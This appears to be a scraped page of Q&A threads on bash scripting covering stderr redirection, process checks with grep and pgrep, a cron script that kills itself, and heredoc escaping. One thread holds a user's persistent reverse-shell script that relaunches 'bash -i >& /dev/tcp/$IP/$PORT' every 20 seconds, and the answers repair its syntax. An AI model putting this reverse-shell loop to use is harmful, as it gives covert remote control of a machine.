Why linux redirect loss info? - linux

I write a script like this:
#!/bin/bash
LOG_PATH=/root/cngiqos-log
LOG_NAME=term.log
TERM_PATH=/home/bnrcqos/qos_M11/term
test -d $LOG_PATH || mkdir -p $LOG_PATH
routeID='M11'
if [ `ps -ef | grep 'term$' | grep -v grep | wc -l` -gt 0 ]; then
echo $routeID' term process is already running'
else
cd $TERM_PATH
(nohup ./term > $LOG_PATH/$LOG_NAME 2>&1 &)
fi
And I input "tail -f /root/cngiqos-log/term.log" and see the log, the log loss info, the log only output part of a log and then don't output any more. But when I input "./term" and run it in fg, the output is fine.
Does any body know why? Is it a system bug?

Maybe you just get what you asked for? tail just gives the last 10 lines by default.

Related

Failing to redirect error message in my command

I'm a rookie in bash scripting, and here's basically my bash script:
Z=`diff -Z $ref_out $exec_out | grep "[<>]" | wc -l` 2>/dev/null
if [ $Z -gt 0 ]; then
echo "*** testcase: [ stdout - FAILED ]"
else
echo "*** testcase: [ stdout - PASSED ]"
fi
I would like to suppress the error message from diff such as:
diff: No such file or directory
This could either result from no $ref_out or $exec_out file, though I'm redirecting to /dev/null, this error message still shows up.
Any help?
You need diff's stderr to go to /dev/null, so it should instead be:
Z=`diff -Z $ref_out $exec_out 2> /dev/null | grep "[<>]" | wc -l`
Your redirection isn't working because it is being applied to the parent shell, not the subshell that runs the pipeline.
If you want to send the stderr of a bunch of commands to /dev/null, you could do it this way - I am using $() instead of backticks:
Z=$( { diff -Z $ref_out $exec_out | grep "[<>]" | wc -l; } 2>/dev/null )
Here, 2>/dev/null applies to all the commands inside { }.
There are many issues in your code. You could rewrite it in a better way:
if diff -Z "$ref_out" "$exec_out" 2>/dev/null | grep -q "[<>]"; then
echo "*** testcase: [ stdout - FAILED ]"
else
echo "*** testcase: [ stdout - PASSED ]"
fi
grep -q is a better way to do this check and you won't need a wc -l unless you want to know the exact number of matches
you need to quote your variables
if statement can include commands; you don't need to capture the output in order to use it in the if statement
You can use shellcheck to validate your shell script and see if you are making the usual mistakes that can break your code.

Error "Integer Expression Expected" in Bash script

So, I'm trying to write a bash script to phone home with a reverse shell to a certain IP using bash if the program isn't already running. It's supposed to check every 20 seconds to see if the process is alive, and if it isn't, it'll execute the shell. However, I get the error ./ReverseShell.sh: line 9: [: ps -ef | grep "bash -i" | grep -v grep | wc -l: integer expression expected When I attempt to execute my program. This is because I'm using -eq in my if statement. When I replace -eq with =, the program compiles, but it evaluates to 0 no matter what.
What am I doing wrong? My code is below.
#!/bin/bash
#A small program designed to establish and keep a reverse shell open
IP="" #Insert your IP here
PORT="" #Insert the Port you're listening on here.
while(true); do
if [ 'ps -ef | grep "bash -i" | grep -v grep | wc -l' -eq 0 ]
then
echo "Process not found, launching reverse shell to $IP on port $PORT"
bash -i >& /dev/tcp/$IP/$PORT 0>&1
sleep 20
else
echo "Process found, sleeping for 20 seconds..."
ps -ef | grep "bash -i" | grep -v "grep" | wc -l
sleep 20
fi
done
There is a small change required in your code.
You have to use tilt "`" instead of single quotes "''" inside if.
if [ `ps -ef | grep "bash -i" | grep -v grep | wc -l` -eq 0 ]
This worked for me. Hope it helps you too.
Besides the typo mentioned in the comments it should be:
if ! pgrep -f 'bash -i' > /dev/null ; then
echo "process not found"
else
echo "process found"
fi
Since pgrep emits a trueish exit status if at least 1 process was found and a falseish exit status if no process was found, you can use it directly in the if condition. [ (which is a command) is not required.
PS: Just realized that this has also been mentioned in comments an hour ago. Will keep it, because it is imo a good practice.

How to use grep in Linux for multiple '&' based search

I am trying to find out of two process are running in linux where my oracle is installed pmon and smon
i used below command for it
ps -ae | grep pmon > /dev/null;echo $?
and
ps -ae | grep smon > /dev/null;echo $?
now i want to optimize both commands in to single
i know there is option in grep as below
ps -ae | grep 'pmon\|smon' > /dev/null;echo $?
but problem here is if any of process running it returns 0 error code
but i want an AND based search instead. Command should return 0 only if both process running.
I would suggest you used something like this:
if ps -ae | grep -q pmon && ps -ae | grep -q smon; then
echo "pmon and smon are running"
fi
The -q switch to grep prevents any output so you don't have to redirect to /dev/null yourself. If you have pgrep, you may be able to use that instead of piping ps to grep.
Of course, you could "optimise" this onto one line, optionally using another && instead of an if but I really don't see the advantage!
You can try this:
pgrep pmon > /dev/null && pgrep smon > /dev/null; echo $?
or
pgrep pmon > /dev/null && pgrep smon > /dev/null && echo both running
Try this :
ps -ae | egrep 'pmon,smon'

Why part of the script cannot execute in the crontab

I have a script stopping the application and zipping some files:
/home/myname/project/stopWithZip.sh
With the properties below:
-rwxrwxr-x. 1 myname myname778 Jun 25 13:48 stopWithZip.sh
Here is the content of the script:
ps -ef | grep project | grep -v grep | awk '{print $2}' |xargs kill -15
month=`date +%m`
year=`date +%Y`
fixLogs=~/project/log/fix/$year$month/*.log.*
errorLogs=~/project/log/error/$year$month/log.*
for log in $fixLogs
do
if [ ! -f "$log.gz" ];
then
gzip $log
echo "Archived:"$log
else
echo "skipping" $log
fi
done
echo "Archived fix log files done"
for log in $errorLogs
do
if [ ! -f "$log.gz" ]; then
gzip $log
echo "Archived:"$log
else
echo "skipping" $log
fi
done
echo "Archived errorlog files done"
The problem is except this ps -ef | grep project | grep -v grep | awk '{print $2}' |xargs kill -15 command, other gzip commands are not executed. I totally don't understand why.
I cannot see any compression of the logs in the directory.
BTW, when I execute the stopWithZip.sh explicitly in command line, it works perfectly fine.
In crontab:
00 05 * * 2-6 /home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1 (NOT work)
In command line:
/home/myname/project>./stopWithZip.sh (work)
Please help
The script fails when run under cron because your script is invoked with project in its path, so the kill pipeline kills the script too.
You could prove (or disprove) this by adding some tracing. Log the output of ps and of awk to log files:
ps -ef |
tee /tmp/ps.log.$$ |
grep project |
grep -v grep |
awk '{print $2}' |
tee /tmp/awk.log.$$ |
xargs kill -15
Review the logs and see that your script is one of the processes being killed.
The crontab entry contains:
/home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1
When ps lists that, it contains 'project' and does not contain 'grep' so the kill in the script kills the script itself.
When you run it from the command line (using a conventional '$' as the prompt), you run:
$ ./stopWithZip.sh
and when ps lists that, it does not contain 'project' so it is not killed.
If you ran:
$ /home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1
from the command line, like you do with cron (crontab), you would find it fails.

BASH script : Integrated document creation hangs

I find that a piece of my bash script causes the hang up. I extract it here :
#!/bin/bash
cat << EndOfFspreadFile >> ./myscript.sh
echo Enter Source Path :
read SRCPATH
FILECNT=`find $SRCPATH/* 2>/dev/null | wc -l`
FILECNTERR=`find $SRCPATH/* 2>&1 | grep "find:" | wc -l`
echo count : $FILECNT
echo problems : $FILECNTERR
EndOfFspreadFile
echo done
This script is expected to just append the script part in the integrated block into myscript.sh file. But it just HANGS !
Thanks !
- Mohamed -
Your $ variables and back quotes will get expanded. You need to escape them in script.
Right now you end up searching the entire filesystem.
Basically, find $SRCPATH/* 2>/dev/null | wc -l gets executed as find /* 2>/dev/null | wc -l
Here is how you can rewrite it (just one line example):
FILECNT=\$(find \$SRCPATH/* 2>/dev/null | wc -l)
By the way, it's easy to find out if you run bash -x <your script>.

Resources